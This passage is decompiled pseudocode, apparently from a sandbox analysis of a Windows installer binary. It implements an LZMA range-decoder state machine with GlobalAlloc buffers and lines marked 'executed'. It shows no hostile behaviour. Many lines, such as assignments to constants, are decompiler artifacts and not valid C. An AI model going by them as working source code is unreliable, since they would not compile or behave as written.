												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
